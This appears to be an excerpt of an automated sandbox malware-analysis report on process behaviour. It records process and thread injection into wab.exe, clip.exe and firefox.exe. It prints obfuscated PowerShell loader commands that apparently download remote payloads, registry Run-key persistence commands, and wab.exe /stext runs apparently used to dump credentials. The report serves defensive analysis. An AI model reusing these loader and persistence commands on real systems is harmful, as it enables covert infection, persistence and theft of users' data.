            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeNtCreateKey: Direct from: 0x76EF2C6C
            Maps a DLL or memory area into another process
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe protection: execute and read and write
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread register set: target process: 6292
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread APC queued: target process: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 295FC44Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E50000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E3F83C
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeIJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeIJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zbfe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');JetJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');JetJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$gdnings = 1;$tripetalous='s';$tripetalous+='ubstrin';$tripetalous+='g';function teucrium($gdskes){$expirable=$gdskes.length-$gdnings;for($heltemodiges=4; $heltemodiges -lt $expirable; $heltemodiges+=(5)){$mirakeldoktorerne+=$gdskes.$tripetalous.invoke($heltemodiges, $gdnings);}$mirakeldoktorerne;}function regulerbare($reticularia){& ($bestandigst) ($reticularia);}$planlggelserne235=teucrium 'leopmc,mpo croz freiprpol.hrilm rgabri /pree5 c r. hex0pl n embr( ha,w po ihemon.lgndpreeo eksw,olissttt ,ppnupt t yie red1ud.i0 mul.fodb0 ska; skr assuwbyttiovernse.s6.oti4el.x; tre depexwhis6u mo4 de,;vsk, alir,entv stt:.aus1,esu2 pic1fagb.cryp0 m t)w.tc d.lggopree npctrickstigoskgg/,jle2 kry0 me 1s lt0stoc0cruo1frkk0sahu1skru kontfskanipertrupcre kiaf valondrixlavr/konv1floc2scou1appl.,ont0stru ';$improvers=teucrium 'arbeudoubstaleepianrtarv-,rogatwitgsclae p.lnte stklas ';$ovariectomize=teucrium 'a rthsemit mastsuffpdykksnonp: saa/nedj/ortoegensu lymrjyd.opimepbegirngomof,rst jere,agncanstt fidisocievir,. t sr.fproch.r/glasmtri,e ciktarb,hmargisemin aasknice1phle. taktnonrhkdlsnover ';$astor=teucrium 'nonf> nd ';$bestandigst=teucrium ' pleil.doesp,lxskit ';$executry203='smittefaren';regulerbare (teucrium 'pugistecoepelstdeta-ventcfl.lodelininddtprepetilbnfreet taa lill-ex.epbehea.psot ab hperi raket k,o:gemm\adjuntartvbossn oce matltemps,obbeeu,o. fortepipxesthtbifr whis-garbv refator lundeuboreehyl pier$blyse remxre.pebigacdionubnsktnonsr a,kydoci2nedv0term3r,ma; men ');regulerbare (teucrium 'untri ov.fhaem sal,(tudbt brue kunsapp tzebr- alpno sa .irt o qh bi nonetgerm:ecot\re pndor v ston mone aceltoilsagroeafsk.tre.tfro x depthjlp)euph{quiceafsyxkvadite.rtsqui}m,le;mi.l ');$teariness = teucrium 'freredynecscrahimp.o gid brul%.ddea,uffp hi pfilhdmadnani,at ma,askum%ha g\beavpov rr nolediscs mani iklgdiagnpappa t,slved 2shir3bu g.syndh,alla konl uni fl,&pose&eate byliebillcafhohpanto kns ve s$tota ';regulerbare (teucrium 'p.lu$c.shgma,tlabonoenthbaspeausorlk ap:fores timu av,ban ri alinram,soprre frerconjtspariun cocronnkass= tek(sprnc kremdertdm.lj felt/ haycmerc over$romet ,rleleveascrur pa.i misnkalde orrsraglsbewh)wamu ');regulerbare (teucrium 'sku,$havigacrold.inovipeblmlea banlm rk: eartdiobaweevaudbyl ly maffao f,rdb,rti c,ag spkh udse.ndbdamin= con$ tevocarov.atra odorpolyirepreoverctordtsor.ostorm accibe,nzsamdebybu.mil,srek.pr onldhoti usttlivs(afsk$ .oba regsbrantdiviogeinrd.mo)a.me ');$ovariectomize=$taalmodighed[0];regulerbare (teucrium ' bra$ lobg mallt.lfot rbbafh.asenels,co:pos d iderberbimetof a itlinesgimbp prorglewoeumeb kval skaedispm u seskrur pensnois=.kvand ugepaliw vul- haro egabarmojflerealdrc f.rtcy e man suna yn nssbkkettabeef,rgmhakk.dis.n exte britbar,.briewethiefan,beftecsaltlmanni.lidebrnenbaa,t tem ');regulerbare (teucrium 'foli$ 